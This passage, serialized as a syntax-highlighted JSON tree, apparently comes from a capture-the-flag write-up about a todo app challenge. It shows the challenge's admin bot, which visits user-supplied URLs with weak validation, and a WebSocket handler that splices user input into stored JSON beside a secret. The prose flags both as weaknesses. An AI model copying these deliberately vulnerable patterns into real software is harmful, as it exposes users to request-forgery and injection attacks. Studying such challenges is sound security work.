page",{"type":33,"tag":128,"props":47593,"children":47594},{"style":312},[47595],{"type":38,"value":5657},{"type":33,"tag":128,"props":47597,"children":47598},{"style":1576},[47599],{"type":38,"value":5796},{"type":33,"tag":128,"props":47601,"children":47602},{"style":306},[47603],{"type":38,"value":47554},{"type":33,"tag":128,"props":47605,"children":47606},{"style":312},[47607],{"type":38,"value":215},{"type":33,"tag":128,"props":47609,"children":47610},{"style":135},[47611],{"type":38,"value":23635},{"type":33,"tag":128,"props":47613,"children":47614},{"style":312},[47615],{"type":38,"value":7857},{"type":33,"tag":128,"props":47617,"children":47618},{"class":130,"line":1026},[47619],{"type":33,"tag":128,"props":47620,"children":47621},{"emptyLinePlaceholder":896},[47622],{"type":38,"value":899},{"type":33,"tag":128,"props":47624,"children":47625},{"class":130,"line":1038},[47626,47630,47634,47638,47642,47646,47650,47654,47658,47663,47667,47671,47676,47680],{"type":33,"tag":128,"props":47627,"children":47628},{"
style":1576},[47629],{"type":38,"value":6768},{"type":33,"tag":128,"props":47631,"children":47632},{"style":306},[47633],{"type":38,"value":47591},{"type":33,"tag":128,"props":47635,"children":47636},{"style":312},[47637],{"type":38,"value":215},{"type":33,"tag":128,"props":47639,"children":47640},{"style":135},[47641],{"type":38,"value":23659},{"type":33,"tag":128,"props":47643,"children":47644},{"style":312},[47645],{"type":38,"value":5566},{"type":33,"tag":128,"props":47647,"children":47648},{"style":306},[47649],{"type":38,"value":23668},{"type":33,"tag":128,"props":47651,"children":47652},{"style":312},[47653],{"type":38,"value":5584},{"type":33,"tag":128,"props":47655,"children":47656},{"style":312},[47657],{"type":38,"value":5642},{"type":33,"tag":128,"props":47659,"children":47660},{"style":437},[47661],{"type":38,"value":47662}," waitUntil",{"type":33,"tag":128,"props":47664,"children":47665},{"style":312},[47666],{"type":38,"value":284},{"type":33,"tag":128,"props":47668,"children":47669},{"style":676},[47670],{"type":38,"value":6739},{"type":33,"tag":128,"props":47672,"children":47673},{"style":140},[47674],{"type":38,"value":47675},"networkidle2",{"type":33,"tag":128,"props":47677,"children":47678},{"style":676},[47679],{"type":38,"value":6040},{"type":33,"tag":128,"props":47681,"children":47682},{"style":312},[47683],{"type":38,"value":13305},{"type":33,"tag":128,"props":47685,"children":47686},{"class":130,"line":1051},[47687,47691,47695,47699,47704,47708,47712,47716,47720],{"type":33,"tag":128,"props":47688,"children":47689},{"style":1576},[47690],{"type":38,"value":6768},{"type":33,"tag":128,"props":47692,"children":47693},{"style":306},[47694],{"type":38,"value":47591},{"type":33,"tag":128,"props":47696,"children":47697},{"style":312},[47698],{"type":38,"value":215},{"type":33,"tag":128,"props":47700,"children":47701},{"style":135},[47702],{"type":38,"value":47703},"waitForSelector",{"type":33,"tag":128,"props":47705,"children":47706},{"style":312},
[47707],{"type":38,"value":5566},{"type":33,"tag":128,"props":47709,"children":47710},{"style":676},[47711],{"type":38,"value":6040},{"type":33,"tag":128,"props":47713,"children":47714},{"style":140},[47715],{"type":38,"value":14844},{"type":33,"tag":128,"props":47717,"children":47718},{"style":676},[47719],{"type":38,"value":6040},{"type":33,"tag":128,"props":47721,"children":47722},{"style":312},[47723],{"type":38,"value":2427},{"type":33,"tag":128,"props":47725,"children":47726},{"class":130,"line":1063},[47727,47731,47735,47739,47743,47747,47751,47756,47760,47764,47769,47773,47777,47781,47786],{"type":33,"tag":128,"props":47728,"children":47729},{"style":1576},[47730],{"type":38,"value":6768},{"type":33,"tag":128,"props":47732,"children":47733},{"style":306},[47734],{"type":38,"value":47591},{"type":33,"tag":128,"props":47736,"children":47737},{"style":312},[47738],{"type":38,"value":215},{"type":33,"tag":128,"props":47740,"children":47741},{"style":135},[47742],{"type":38,"value":14078},{"type":33,"tag":128,"props":47744,"children":47745},{"style":312},[47746],{"type":38,"value":5566},{"type":33,"tag":128,"props":47748,"children":47749},{"style":676},[47750],{"type":38,"value":6040},{"type":33,"tag":128,"props":47752,"children":47753},{"style":140},[47754],{"type":38,"value":47755},"wired-input[name=username]",{"type":33,"tag":128,"props":47757,"children":47758},{"style":676},[47759],{"type":38,"value":6040},{"type":33,"tag":128,"props":47761,"children":47762},{"style":312},[47763],{"type":38,"value":5584},{"type":33,"tag":128,"props":47765,"children":47766},{"style":306},[47767],{"type":38,"value":47768}," 
process",{"type":33,"tag":128,"props":47770,"children":47771},{"style":312},[47772],{"type":38,"value":215},{"type":33,"tag":128,"props":47774,"children":47775},{"style":306},[47776],{"type":38,"value":44351},{"type":33,"tag":128,"props":47778,"children":47779},{"style":312},[47780],{"type":38,"value":215},{"type":33,"tag":128,"props":47782,"children":47783},{"style":306},[47784],{"type":38,"value":47785},"USERNAME",{"type":33,"tag":128,"props":47787,"children":47788},{"style":312},[47789],{"type":38,"value":2427},{"type":33,"tag":128,"props":47791,"children":47792},{"class":130,"line":1076},[47793,47797,47801,47805,47809,47813,47817,47822,47826,47830,47834,47838,47842,47846,47851],{"type":33,"tag":128,"props":47794,"children":47795},{"style":1576},[47796],{"type":38,"value":6768},{"type":33,"tag":128,"props":47798,"children":47799},{"style":306},[47800],{"type":38,"value":47591},{"type":33,"tag":128,"props":47802,"children":47803},{"style":312},[47804],{"type":38,"value":215},{"type":33,"tag":128,"props":47806,"children":47807},{"style":135},[47808],{"type":38,"value":14078},{"type":33,"tag":128,"props":47810,"children":47811},{"style":312},[47812],{"type":38,"value":5566},{"type":33,"tag":128,"props":47814,"children":47815},{"style":676},[47816],{"type":38,"value":6040},{"type":33,"tag":128,"props":47818,"children":47819},{"style":140},[47820],{"type":38,"value":47821},"wired-input[name=password]",{"type":33,"tag":128,"props":47823,"children":47824},{"style":676},[47825],{"type":38,"value":6040},{"type":33,"tag":128,"props":47827,"children":47828},{"style":312},[47829],{"type":38,"value":5584},{"type":33,"tag":128,"props":47831,"children":47832},{"style":306},[47833],{"type":38,"value":47768},{"type":33,"tag":128,"props":47835,"children":47836},{"style":312},[47837],{"type":38,"value":215},{"type":33,"tag":128,"props":47839,"children":47840},{"style":306},[47841],{"type":38,"value":44351},{"type":33,"tag":128,"props":47843,"children":47844},{"style":312},[47845],{
"type":38,"value":215},{"type":33,"tag":128,"props":47847,"children":47848},{"style":306},[47849],{"type":38,"value":47850},"PASSWORD",{"type":33,"tag":128,"props":47852,"children":47853},{"style":312},[47854],{"type":38,"value":2427},{"type":33,"tag":128,"props":47856,"children":47857},{"class":130,"line":1089},[47858,47862,47866,47870,47874,47878,47882,47887,47891],{"type":33,"tag":128,"props":47859,"children":47860},{"style":1576},[47861],{"type":38,"value":6768},{"type":33,"tag":128,"props":47863,"children":47864},{"style":306},[47865],{"type":38,"value":47591},{"type":33,"tag":128,"props":47867,"children":47868},{"style":312},[47869],{"type":38,"value":215},{"type":33,"tag":128,"props":47871,"children":47872},{"style":135},[47873],{"type":38,"value":7852},{"type":33,"tag":128,"props":47875,"children":47876},{"style":312},[47877],{"type":38,"value":5566},{"type":33,"tag":128,"props":47879,"children":47880},{"style":676},[47881],{"type":38,"value":6040},{"type":33,"tag":128,"props":47883,"children":47884},{"style":140},[47885],{"type":38,"value":47886},"wired-button",{"type":33,"tag":128,"props":47888,"children":47889},{"style":676},[47890],{"type":38,"value":6040},{"type":33,"tag":128,"props":47892,"children":47893},{"style":312},[47894],{"type":38,"value":2427},{"type":33,"tag":128,"props":47896,"children":47897},{"class":130,"line":1101},[47898],{"type":33,"tag":128,"props":47899,"children":47900},{"emptyLinePlaceholder":896},[47901],{"type":38,"value":899},{"type":33,"tag":128,"props":47903,"children":47904},{"class":130,"line":1114},[47905,47909],{"type":33,"tag":128,"props":47906,"children":47907},{"style":1576},[47908],{"type":38,"value":16034},{"type":33,"tag":128,"props":47910,"children":47911},{"style":312},[47912],{"type":38,"value":762},{"type":33,"tag":128,"props":47914,"children":47915},{"class":130,"line":1127},[47916,47920,47924,47928,47932,47936,47940,47944,47948,47952,47956,47960,47964,47968],{"type":33,"tag":128,"props":47917,"children":47918},
{"style":1576},[47919],{"type":38,"value":17718},{"type":33,"tag":128,"props":47921,"children":47922},{"style":306},[47923],{"type":38,"value":47591},{"type":33,"tag":128,"props":47925,"children":47926},{"style":312},[47927],{"type":38,"value":215},{"type":33,"tag":128,"props":47929,"children":47930},{"style":135},[47931],{"type":38,"value":23659},{"type":33,"tag":128,"props":47933,"children":47934},{"style":312},[47935],{"type":38,"value":5566},{"type":33,"tag":128,"props":47937,"children":47938},{"style":306},[47939],{"type":38,"value":13952},{"type":33,"tag":128,"props":47941,"children":47942},{"style":312},[47943],{"type":38,"value":5584},{"type":33,"tag":128,"props":47945,"children":47946},{"style":312},[47947],{"type":38,"value":5642},{"type":33,"tag":128,"props":47949,"children":47950},{"style":437},[47951],{"type":38,"value":47662},{"type":33,"tag":128,"props":47953,"children":47954},{"style":312},[47955],{"type":38,"value":284},{"type":33,"tag":128,"props":47957,"children":47958},{"style":676},[47959],{"type":38,"value":6739},{"type":33,"tag":128,"props":47961,"children":47962},{"style":140},[47963],{"type":38,"value":47675},{"type":33,"tag":128,"props":47965,"children":47966},{"style":676},[47967],{"type":38,"value":6040},{"type":33,"tag":128,"props":47969,"children":47970},{"style":312},[47971],{"type":38,"value":13305},{"type":33,"tag":128,"props":47973,"children":47974},{"class":130,"line":1139},[47975,47979,47984],{"type":33,"tag":128,"props":47976,"children":47977},{"style":312},[47978],{"type":38,"value":14264},{"type":33,"tag":128,"props":47980,"children":47981},{"style":1576},[47982],{"type":38,"value":47983}," 
finally",{"type":33,"tag":128,"props":47985,"children":47986},{"style":312},[47987],{"type":38,"value":762},{"type":33,"tag":128,"props":47989,"children":47990},{"class":130,"line":1152},[47991,47995,47999,48003,48007],{"type":33,"tag":128,"props":47992,"children":47993},{"style":1576},[47994],{"type":38,"value":17718},{"type":33,"tag":128,"props":47996,"children":47997},{"style":306},[47998],{"type":38,"value":47591},{"type":33,"tag":128,"props":48000,"children":48001},{"style":312},[48002],{"type":38,"value":215},{"type":33,"tag":128,"props":48004,"children":48005},{"style":135},[48006],{"type":38,"value":23692},{"type":33,"tag":128,"props":48008,"children":48009},{"style":312},[48010],{"type":38,"value":7857},{"type":33,"tag":128,"props":48012,"children":48013},{"class":130,"line":1165},[48014,48018,48022,48026,48030],{"type":33,"tag":128,"props":48015,"children":48016},{"style":1576},[48017],{"type":38,"value":17718},{"type":33,"tag":128,"props":48019,"children":48020},{"style":306},[48021],{"type":38,"value":47554},{"type":33,"tag":128,"props":48023,"children":48024},{"style":312},[48025],{"type":38,"value":215},{"type":33,"tag":128,"props":48027,"children":48028},{"style":135},[48029],{"type":38,"value":23692},{"type":33,"tag":128,"props":48031,"children":48032},{"style":312},[48033],{"type":38,"value":7857},{"type":33,"tag":128,"props":48035,"children":48036},{"class":130,"line":1177},[48037],{"type":33,"tag":128,"props":48038,"children":48039},{"style":312},[48040],{"type":38,"value":6760},{"type":33,"tag":128,"props":48042,"children":48043},{"class":130,"line":1189},[48044],{"type":33,"tag":128,"props":48045,"children":48046},{"style":312},[48047],{"type":38,"value":854},{"type":33,"tag":128,"props":48049,"children":48050},{"class":130,"line":1202},[48051],{"type":33,"tag":128,"props":48052,"children":48053},{"emptyLinePlaceholder":896},[48054],{"type":38,"value":899},{"type":33,"tag":128,"props":48056,"children":48057},{"class":130,"line":1214},[48058,4806
2,48066,48070,48074,48078,48082,48086,48090,48094,48098],{"type":33,"tag":128,"props":48059,"children":48060},{"style":300},[48061],{"type":38,"value":15973},{"type":33,"tag":128,"props":48063,"children":48064},{"style":135},[48065],{"type":38,"value":47320},{"type":33,"tag":128,"props":48067,"children":48068},{"style":312},[48069],{"type":38,"value":5657},{"type":33,"tag":128,"props":48071,"children":48072},{"style":300},[48073],{"type":38,"value":5598},{"type":33,"tag":128,"props":48075,"children":48076},{"style":312},[48077],{"type":38,"value":2852},{"type":33,"tag":128,"props":48079,"children":48080},{"style":306},[48081],{"type":38,"value":5607},{"type":33,"tag":128,"props":48083,"children":48084},{"style":312},[48085],{"type":38,"value":5584},{"type":33,"tag":128,"props":48087,"children":48088},{"style":306},[48089],{"type":38,"value":5616},{"type":33,"tag":128,"props":48091,"children":48092},{"style":312},[48093],{"type":38,"value":2966},{"type":33,"tag":128,"props":48095,"children":48096},{"style":312},[48097],{"type":38,"value":5625},{"type":33,"tag":128,"props":48099,"children":48100},{"style":312},[48101],{"type":38,"value":762},{"type":33,"tag":128,"props":48103,"children":48104},{"class":130,"line":1226},[48105],{"type":33,"tag":128,"props":48106,"children":48107},{"emptyLinePlaceholder":896},[48108],{"type":38,"value":899},{"type":33,"tag":128,"props":48110,"children":48111},{"class":130,"line":1239},[48112,48116,48120,48124,48129,48133],{"type":33,"tag":128,"props":48113,"children":48114},{"style":1576},[48115],{"type":38,"value":6625},{"type":33,"tag":128,"props":48117,"children":48118},{"style":312},[48119],{"type":38,"value":2852},{"type":33,"tag":128,"props":48121,"children":48122},{"style":300},[48123],{"type":38,"value":16424},{"type":33,"tag":128,"props":48125,"children":48126},{"style":306},[48127],{"type":38,"value":48128},"browser",{"type":33,"tag":128,"props":48130,"children":48131},{"style":312},[48132],{"type":38,"value":2966},{"type":33,
"tag":128,"props":48134,"children":48135},{"style":312},[48136],{"type":38,"value":762},{"type":33,"tag":128,"props":48138,"children":48139},{"class":130,"line":1251},[48140,48144,48148,48152,48156,48160,48165,48169],{"type":33,"tag":128,"props":48141,"children":48142},{"style":306},[48143],{"type":38,"value":16105},{"type":33,"tag":128,"props":48145,"children":48146},{"style":312},[48147],{"type":38,"value":215},{"type":33,"tag":128,"props":48149,"children":48150},{"style":135},[48151],{"type":38,"value":13157},{"type":33,"tag":128,"props":48153,"children":48154},{"style":312},[48155],{"type":38,"value":5566},{"type":33,"tag":128,"props":48157,"children":48158},{"style":676},[48159],{"type":38,"value":6040},{"type":33,"tag":128,"props":48161,"children":48162},{"style":140},[48163],{"type":38,"value":48164},"[INFO] Starting browser",{"type":33,"tag":128,"props":48166,"children":48167},{"style":676},[48168],{"type":38,"value":6040},{"type":33,"tag":128,"props":48170,"children":48171},{"style":312},[48172],{"type":38,"value":2427},{"type":33,"tag":128,"props":48174,"children":48175},{"class":130,"line":1263},[48176,48181,48185,48189,48193,48197,48202],{"type":33,"tag":128,"props":48177,"children":48178},{"style":306},[48179],{"type":38,"value":48180},"        
browser",{"type":33,"tag":128,"props":48182,"children":48183},{"style":312},[48184],{"type":38,"value":5657},{"type":33,"tag":128,"props":48186,"children":48187},{"style":1576},[48188],{"type":38,"value":5796},{"type":33,"tag":128,"props":48190,"children":48191},{"style":306},[48192],{"type":38,"value":47377},{"type":33,"tag":128,"props":48194,"children":48195},{"style":312},[48196],{"type":38,"value":215},{"type":33,"tag":128,"props":48198,"children":48199},{"style":135},[48200],{"type":38,"value":48201},"launch",{"type":33,"tag":128,"props":48203,"children":48204},{"style":312},[48205],{"type":38,"value":48206},"({\n",{"type":33,"tag":128,"props":48208,"children":48209},{"class":130,"line":1276},[48210,48215,48219],{"type":33,"tag":128,"props":48211,"children":48212},{"style":437},[48213],{"type":38,"value":48214},"            args",{"type":33,"tag":128,"props":48216,"children":48217},{"style":312},[48218],{"type":38,"value":284},{"type":33,"tag":128,"props":48220,"children":48221},{"style":312},[48222],{"type":38,"value":1466},{"type":33,"tag":128,"props":48224,"children":48225},{"class":130,"line":1288},[48226],{"type":33,"tag":128,"props":48227,"children":48228},{"style":312},[48229],{"type":38,"value":48230},"                ...\n",{"type":33,"tag":128,"props":48232,"children":48233},{"class":130,"line":1300},[48234],{"type":33,"tag":128,"props":48235,"children":48236},{"style":312},[48237],{"type":38,"value":48238},"            ]\n",{"type":33,"tag":128,"props":48240,"children":48241},{"class":130,"line":1313},[48242],{"type":33,"tag":128,"props":48243,"children":48244},{"style":312},[48245],{"type":38,"value":48246},"        
})\n",{"type":33,"tag":128,"props":48248,"children":48249},{"class":130,"line":1327},[48250],{"type":33,"tag":128,"props":48251,"children":48252},{"style":312},[48253],{"type":38,"value":6760},{"type":33,"tag":128,"props":48255,"children":48256},{"class":130,"line":11196},[48257],{"type":33,"tag":128,"props":48258,"children":48259},{"emptyLinePlaceholder":896},[48260],{"type":38,"value":899},{"type":33,"tag":128,"props":48262,"children":48263},{"class":130,"line":11204},[48264,48268,48272,48276,48280,48284,48288,48292],{"type":33,"tag":128,"props":48265,"children":48266},{"style":300},[48267],{"type":38,"value":5696},{"type":33,"tag":128,"props":48269,"children":48270},{"style":306},[48271],{"type":38,"value":15126},{"type":33,"tag":128,"props":48273,"children":48274},{"style":312},[48275],{"type":38,"value":5657},{"type":33,"tag":128,"props":48277,"children":48278},{"style":306},[48279],{"type":38,"value":5662},{"type":33,"tag":128,"props":48281,"children":48282},{"style":312},[48283],{"type":38,"value":215},{"type":33,"tag":128,"props":48285,"children":48286},{"style":306},[48287],{"type":38,"value":5671},{"type":33,"tag":128,"props":48289,"children":48290},{"style":312},[48291],{"type":38,"value":215},{"type":33,"tag":128,"props":48293,"children":48294},{"style":306},[48295],{"type":38,"value":48296},"url\n",{"type":33,"tag":128,"props":48298,"children":48299},{"class":130,"line":11213},[48300,48304],{"type":33,"tag":128,"props":48301,"children":48302},{"style":1576},[48303],{"type":38,"value":6625},{"type":33,"tag":128,"props":48305,"children":48306},{"style":312},[48307],{"type":38,"value":41261},{"type":33,"tag":128,"props":48309,"children":48310},{"class":130,"line":11250},[48311,48316,48320,48325],{"type":33,"tag":128,"props":48312,"children":48313},{"style":306},[48314],{"type":38,"value":48315},"        
url",{"type":33,"tag":128,"props":48317,"children":48318},{"style":300},[48319],{"type":38,"value":13595},{"type":33,"tag":128,"props":48321,"children":48322},{"style":300},[48323],{"type":38,"value":48324}," undefined",{"type":33,"tag":128,"props":48326,"children":48327},{"style":300},[48328],{"type":38,"value":48329}," ||\n",{"type":33,"tag":128,"props":48331,"children":48332},{"class":130,"line":11270},[48333,48337,48341,48345,48349,48354,48358,48362,48367,48371,48375,48379,48383,48387,48391,48395,48399,48403,48408,48412],{"type":33,"tag":128,"props":48334,"children":48335},{"style":312},[48336],{"type":38,"value":19659},{"type":33,"tag":128,"props":48338,"children":48339},{"style":300},[48340],{"type":38,"value":16424},{"type":33,"tag":128,"props":48342,"children":48343},{"style":306},[48344],{"type":38,"value":13952},{"type":33,"tag":128,"props":48346,"children":48347},{"style":312},[48348],{"type":38,"value":215},{"type":33,"tag":128,"props":48350,"children":48351},{"style":135},[48352],{"type":38,"value":48353},"startsWith",{"type":33,"tag":128,"props":48355,"children":48356},{"style":312},[48357],{"type":38,"value":5566},{"type":33,"tag":128,"props":48359,"children":48360},{"style":676},[48361],{"type":38,"value":6040},{"type":33,"tag":128,"props":48363,"children":48364},{"style":140},[48365],{"type":38,"value":48366},"http://",{"type":33,"tag":128,"props":48368,"children":48369},{"style":676},[48370],{"type":38,"value":6040},{"type":33,"tag":128,"props":48372,"children":48373},{"style":312},[48374],{"type":38,"value":2966},{"type":33,"tag":128,"props":48376,"children":48377},{"style":300},[48378],{"type":38,"value":10037},{"type":33,"tag":128,"props":48380,"children":48381},{"style":300},[48382],{"type":38,"value":35731},{"type":33,"tag":128,"props":48384,"children":48385},{"style":306},[48386],{"type":38,"value":13952},{"type":33,"tag":128,"props":48388,"children":48389},{"style":312},[48390],{"type":38,"value":215},{"type":33,"tag":128,"props":48392,"chil
dren":48393},{"style":135},[48394],{"type":38,"value":48353},{"type":33,"tag":128,"props":48396,"children":48397},{"style":312},[48398],{"type":38,"value":5566},{"type":33,"tag":128,"props":48400,"children":48401},{"style":676},[48402],{"type":38,"value":6040},{"type":33,"tag":128,"props":48404,"children":48405},{"style":140},[48406],{"type":38,"value":48407},"https://",{"type":33,"tag":128,"props":48409,"children":48410},{"style":676},[48411],{"type":38,"value":6040},{"type":33,"tag":128,"props":48413,"children":48414},{"style":312},[48415],{"type":38,"value":2459},{"type":33,"tag":128,"props":48417,"children":48418},{"class":130,"line":11278},[48419,48424],{"type":33,"tag":128,"props":48420,"children":48421},{"style":312},[48422],{"type":38,"value":48423},"    )",{"type":33,"tag":128,"props":48425,"children":48426},{"style":312},[48427],{"type":38,"value":762},{"type":33,"tag":128,"props":48429,"children":48430},{"class":130,"line":11334},[48431,48435,48439,48443,48447,48451,48455,48459,48463,48467,48471,48475,48479,48484,48488],{"type":33,"tag":128,"props":48432,"children":48433},{"style":1576},[48434],{"type":38,"value":13615},{"type":33,"tag":128,"props":48436,"children":48437},{"style":306},[48438],{"type":38,"value":5616},{"type":33,"tag":128,"props":48440,"children":48441},{"style":312},[48442],{"type":38,"value":215},{"type":33,"tag":128,"props":48444,"children":48445},{"style":135},[48446],{"type":38,"value":6686},{"type":33,"tag":128,"props":48448,"children":48449},{"style":312},[48450],{"type":38,"value":5566},{"type":33,"tag":128,"props":48452,"children":48453},{"style":523},[48454],{"type":38,"value":6695},{"type":33,"tag":128,"props":48456,"children":48457},{"style":312},[48458],{"type":38,"value":6700},{"type":33,"tag":128,"props":48460,"children":48461},{"style":135},[48462],{"type":38,"value":23433},{"type":33,"tag":128,"props":48464,"children":48465},{"style":312},[48466],{"type":38,"value":5836},{"type":33,"tag":128,"props":48468,"children":48469
},{"style":437},[48470],{"type":38,"value":14251},{"type":33,"tag":128,"props":48472,"children":48473},{"style":312},[48474],{"type":38,"value":284},{"type":33,"tag":128,"props":48476,"children":48477},{"style":676},[48478],{"type":38,"value":6739},{"type":33,"tag":128,"props":48480,"children":48481},{"style":140},[48482],{"type":38,"value":48483},"Invalid URL",{"type":33,"tag":128,"props":48485,"children":48486},{"style":676},[48487],{"type":38,"value":6040},{"type":33,"tag":128,"props":48489,"children":48490},{"style":312},[48491],{"type":38,"value":13305},{"type":33,"tag":128,"props":48493,"children":48494},{"class":130,"line":11375},[48495],{"type":33,"tag":128,"props":48496,"children":48497},{"style":312},[48498],{"type":38,"value":6760},{"type":33,"tag":128,"props":48500,"children":48501},{"class":130,"line":11383},[48502],{"type":33,"tag":128,"props":48503,"children":48504},{"emptyLinePlaceholder":896},[48505],{"type":38,"value":899},{"type":33,"tag":128,"props":48507,"children":48508},{"class":130,"line":11392},[48509,48513],{"type":33,"tag":128,"props":48510,"children":48511},{"style":1576},[48512],{"type":38,"value":16034},{"type":33,"tag":128,"props":48514,"children":48515},{"style":312},[48516],{"type":38,"value":762},{"type":33,"tag":128,"props":48518,"children":48519},{"class":130,"line":11417},[48520,48524,48528,48532,48536],{"type":33,"tag":128,"props":48521,"children":48522},{"style":1576},[48523],{"type":38,"value":17718},{"type":33,"tag":128,"props":48525,"children":48526},{"style":135},[48527],{"type":38,"value":23404},{"type":33,"tag":128,"props":48529,"children":48530},{"style":312},[48531],{"type":38,"value":5566},{"type":33,"tag":128,"props":48533,"children":48534},{"style":306},[48535],{"type":38,"value":13952},{"type":33,"tag":128,"props":48537,"children":48538},{"style":312},[48539],{"type":38,"value":2427},{"type":33,"tag":128,"props":48541,"children":48542},{"class":130,"line":11441},[48543,48547,48551,48555,48560,48564,48568],{"type":33
,"tag":128,"props":48544,"children":48545},{"style":1576},[48546],{"type":38,"value":13615},{"type":33,"tag":128,"props":48548,"children":48549},{"style":306},[48550],{"type":38,"value":5616},{"type":33,"tag":128,"props":48552,"children":48553},{"style":312},[48554],{"type":38,"value":215},{"type":33,"tag":128,"props":48556,"children":48557},{"style":135},[48558],{"type":38,"value":48559},"sendStatus",{"type":33,"tag":128,"props":48561,"children":48562},{"style":312},[48563],{"type":38,"value":5566},{"type":33,"tag":128,"props":48565,"children":48566},{"style":523},[48567],{"type":38,"value":46595},{"type":33,"tag":128,"props":48569,"children":48570},{"style":312},[48571],{"type":38,"value":2427},{"type":33,"tag":128,"props":48573,"children":48575},{"class":130,"line":48574},50,[48576,48580,48584,48588,48592,48596],{"type":33,"tag":128,"props":48577,"children":48578},{"style":312},[48579],{"type":38,"value":14264},{"type":33,"tag":128,"props":48581,"children":48582},{"style":1576},[48583],{"type":38,"value":6855},{"type":33,"tag":128,"props":48585,"children":48586},{"style":312},[48587],{"type":38,"value":2852},{"type":33,"tag":128,"props":48589,"children":48590},{"style":306},[48591],{"type":38,"value":23474},{"type":33,"tag":128,"props":48593,"children":48594},{"style":312},[48595],{"type":38,"value":2966},{"type":33,"tag":128,"props":48597,"children":48598},{"style":312},[48599],{"type":38,"value":762},{"type":33,"tag":128,"props":48601,"children":48603},{"class":130,"line":48602},51,[48604,48608,48612,48616,48620,48624,48628,48632,48636,48640,48644,48648,48653,48657,48661],{"type":33,"tag":128,"props":48605,"children":48606},{"style":1576},[48607],{"type":38,"value":13615},{"type":33,"tag":128,"props":48609,"children":48610},{"style":306},[48611],{"type":38,"value":5616},{"type":33,"tag":128,"props":48613,"children":48614},{"style":312},[48615],{"type":38,"value":215},{"type":33,"tag":128,"props":48617,"children":48618},{"style":135},[48619],{"type":38,"value":6
686},{"type":33,"tag":128,"props":48621,"children":48622},{"style":312},[48623],{"type":38,"value":5566},{"type":33,"tag":128,"props":48625,"children":48626},{"style":523},[48627],{"type":38,"value":6695},{"type":33,"tag":128,"props":48629,"children":48630},{"style":312},[48631],{"type":38,"value":6700},{"type":33,"tag":128,"props":48633,"children":48634},{"style":135},[48635],{"type":38,"value":23433},{"type":33,"tag":128,"props":48637,"children":48638},{"style":312},[48639],{"type":38,"value":5836},{"type":33,"tag":128,"props":48641,"children":48642},{"style":437},[48643],{"type":38,"value":14251},{"type":33,"tag":128,"props":48645,"children":48646},{"style":312},[48647],{"type":38,"value":284},{"type":33,"tag":128,"props":48649,"children":48650},{"style":306},[48651],{"type":38,"value":48652}," e",{"type":33,"tag":128,"props":48654,"children":48655},{"style":312},[48656],{"type":38,"value":215},{"type":33,"tag":128,"props":48658,"children":48659},{"style":306},[48660],{"type":38,"value":6948},{"type":33,"tag":128,"props":48662,"children":48663},{"style":312},[48664],{"type":38,"value":13305},{"type":33,"tag":128,"props":48666,"children":48668},{"class":130,"line":48667},52,[48669],{"type":33,"tag":128,"props":48670,"children":48671},{"style":312},[48672],{"type":38,"value":6760},{"type":33,"tag":128,"props":48674,"children":48676},{"class":130,"line":48675},53,[48677],{"type":33,"tag":128,"props":48678,"children":48679},{"style":312},[48680],{"type":38,"value":854},{"type":33,"tag":128,"props":48682,"children":48684},{"class":130,"line":48683},54,[48685],{"type":33,"tag":128,"props":48686,"children":48687},{"emptyLinePlaceholder":896},[48688],{"type":38,"value":899},{"type":33,"tag":128,"props":48690,"children":48692},{"class":130,"line":48691},55,[48693,48698,48702,48707,48711,48715,48719],{"type":33,"tag":128,"props":48694,"children":48695},{"style":437},[48696],{"type":38,"value":48697},"module",{"type":33,"tag":128,"props":48699,"children":48700},{"style":312
},[48701],{"type":38,"value":215},{"type":33,"tag":128,"props":48703,"children":48704},{"style":437},[48705],{"type":38,"value":48706},"exports",{"type":33,"tag":128,"props":48708,"children":48709},{"style":312},[48710],{"type":38,"value":5657},{"type":33,"tag":128,"props":48712,"children":48713},{"style":312},[48714],{"type":38,"value":5642},{"type":33,"tag":128,"props":48716,"children":48717},{"style":306},[48718],{"type":38,"value":47320},{"type":33,"tag":128,"props":48720,"children":48721},{"style":312},[48722],{"type":38,"value":37888},{"type":33,"tag":47,"props":48724,"children":48725},{},[48726,48727,48732],{"type":38,"value":2766},{"type":33,"tag":105,"props":48728,"children":48730},{"className":48729},[],[48731],{"type":38,"value":47353},{"type":38,"value":48733}," will first visit the login page of the todoApp and log in with the admin credentials. Then it will visit the URL that is passed in the request body. Note that the only validation applied to that URL is a check that it starts with http:// or https://, so the authenticated bot can be pointed at internal addresses, including the app itself at 127.0.0.1, as the LOGIN_URL comment above already does.",{"type":33,"tag":40,"props":48735,"children":48737},{"id":48736},"wshandler",[48738],{"type":38,"value":48739},"WsHandler",{"type":33,"tag":47,"props":48741,"children":48742},{},[48743,48745,48751],{"type":38,"value":48744},"And the most important part is the ",{"type":33,"tag":105,"props":48746,"children":48748},{"className":48747},[],[48749],{"type":38,"value":48750},"wsHandler.js",{"type":38,"value":48752}," file. It is used to create and list tasks. Note that the add handler stores each task by interpolating the user-supplied title and description directly into a JSON string together with the secret, rather than serializing an object.",{"type":33,"tag":114,"props":48754,"children":48755},{"lang":5526},[48756],{"type":33,"tag":119,"props":48757,"children":48759},{"code":48758,"language":5526,"meta":8,"className":5530,"style":8},"const { encrypt, decrypt } = require('./util/crypto');\n\nlet db;\nlet sessionParser;\n\nconst quotes = [\n    \"Genius is one percent inspiration and ninety-nine percent perspiration.\",\n    \"Fate is in your hands and no one elses.\",\n    \"Trust yourself. 
You know more than you think you do.\"\n];\n\nconst wsHandler = (ws, req) => {\n    let userId;\n    sessionParser(req, {}, () => {\n        if (req.session.userId) {\n            userId = req.session.userId;\n        } else {\n            ws.close();\n        }\n    });\n\n    ws.on('message', async (msg) => {\n        const data = JSON.parse(msg);\n        const secret = await db.getSecret(req.session.userId);\n\n        if (data.action === 'add') {\n            try {\n                await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n                ws.send(JSON.stringify({ success: true, action: 'add' }));\n            } catch (e) {\n                ws.send(JSON.stringify({ success: false, action: 'add' }));\n            }\n        }\n        else if (data.action === 'get') {\n            try {\n                const results = await db.getTasks(userId);\n                const tasks = [];\n                for (const result of results) {\n\n                    let quote;\n\n                    if (userId === 1) {\n                        quote = `A wise man once said, \"the flag is ${process.env.FLAG}\".`;\n                    } else {\n                        quote = quotes[Math.floor(Math.random() * quotes.length)];\n                    }\n\n                    try {\n                        const task = JSON.parse(result.data);\n                        tasks.push({\n                            title: encrypt(task.title, task.secret),\n                            description: encrypt(task.description, task.secret),\n                            quote: encrypt(quote, task.secret)\n                        });\n                    } catch (e) {\n                        console.log(`Error parsing task ${result.data}: ${e}`);\n                    }\n                }\n                ws.send(JSON.stringify({ success: true, action: 